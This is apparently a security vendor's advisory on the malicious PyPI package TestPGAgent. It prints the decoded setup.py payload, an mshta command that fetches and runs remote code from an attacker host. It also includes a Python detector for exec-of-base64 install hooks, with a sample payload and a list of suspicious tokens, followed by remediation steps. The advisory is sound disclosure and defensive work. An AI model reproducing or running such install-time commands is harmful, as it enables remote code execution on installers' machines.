Malicious package

TestPGAgent (PyPI)

Malicious code in testpgagent (PyPI). Remove it immediately and rotate any exposed credentials.

MAL-2026-5824
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
pip uninstall TestPGAgent

What this malware does

On pip install, setup.py line 19 calls exec(base64.b64decode(...)) whose decoded body is import os; os.system('cmd /c "mshta http://fixars.top"'). This launches Windows mshta.exe against http://fixars.top over plaintext HTTP, fetching and executing an arbitrary HTML-application payload on the installer's machine. The payload is obfuscated with base64+exec to evade casual inspection. The fetch destination is unrelated to any declared publisher, content is unpinned and mutable, and execution is fully attacker-controlled. Any Windows machine running pip install TestPGAgent==0.2 will execute remote code chosen by whoever controls fixars.top at the moment of install.

During installation, the code attempts to download and start a malicious executable.
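The install-time pattern described above (exec of a base64-decoded string in setup.py) can be caught statically, before pip ever runs it. The following is an added example, not code from the original advisory or from O3 Security: it parses a setup.py with ast, locates exec(base64.b64decode(...)) calls, decodes the payload without executing it, and flags tokens such as mshta. The sample setup.py is constructed and uses a placeholder URL, not the real callback host.

```python
import ast
import base64

# Tokens worth flagging in a decoded install-time payload (defender's heuristic list).
SUSPICIOUS = ("mshta", "os.system", "subprocess", "http://", "powershell", "curl ")


def _is_b64decode_of_literal(node):
    """True for base64.b64decode(<literal>) or b64decode(<literal>) with one constant arg."""
    if not isinstance(node, ast.Call) or len(node.args) != 1:
        return False
    arg = node.args[0]
    if not (isinstance(arg, ast.Constant) and isinstance(arg.value, (str, bytes))):
        return False
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr == "b64decode"
    return isinstance(func, ast.Name) and func.id == "b64decode"


def find_exec_b64(source):
    """Return (lineno, decoded_payload, hits) for every exec(b64decode(<literal>)) in source."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        is_exec = isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and node.func.id == "exec"
        if not (is_exec and node.args and _is_b64decode_of_literal(node.args[0])):
            continue
        try:
            # Decode only; the payload is never executed, so this is safe on untrusted setup.py files.
            payload = base64.b64decode(node.args[0].args[0].value, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            payload = "<undecodable base64>"
        findings.append((node.lineno, payload, [t for t in SUSPICIOUS if t in payload]))
    return findings


# Constructed sample setup.py mirroring the pattern described above; the URL is a placeholder.
_PAYLOAD = b"import os; os.system('cmd /c \"mshta http://example.invalid\"')"
SAMPLE_SETUP_PY = (
    "from setuptools import setup\n"
    "import base64\n"
    "exec(base64.b64decode('" + base64.b64encode(_PAYLOAD).decode() + "'))\n"
    "setup(name='demo', version='0.1')\n"
)

if __name__ == "__main__":
    for lineno, payload, hits in find_exec_b64(SAMPLE_SETUP_PY):
        print(f"setup.py line {lineno}: exec of base64 payload -> {payload!r}; flags: {hits}")
```

Run it over every setup.py in a vendored or mirrored package tree; any non-empty result is worth a manual look even when the flag list is empty, since an exec of a base64 literal has no legitimate packaging purpose.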

Likely related to 2025-08-raknet-testing-package.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-easyaillm

Reasons (based on the campaign):

  • Downloads and executes a remote executable.
  • obfuscation
  • malware
  • tool:mshta

Malicious versions

2 flagged: 0.1, 0.2

Indicators of compromise (SHA-256)


Detection & response playbook

Credential / info stealer
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for TestPGAgent (2 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging TestPGAgent across your stack and pipelines.

  2. If you installed it — respond

    TestPGAgent is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

  3. Did it already run?

    If TestPGAgent was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks TestPGAgent before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. TestPGAgent on PyPI has been identified as a malicious package (versions 0.1, 0.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006655
2026-06-easyaillm

Credits

  • Amazon Inspector · finder
  • Kamil Mańkowski (kam193) · reporter

Detect & block this

O3 blocks TestPGAgent-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.

TestPGAgent (PyPI) malicious package — MAL-2026-5824 | O3 Security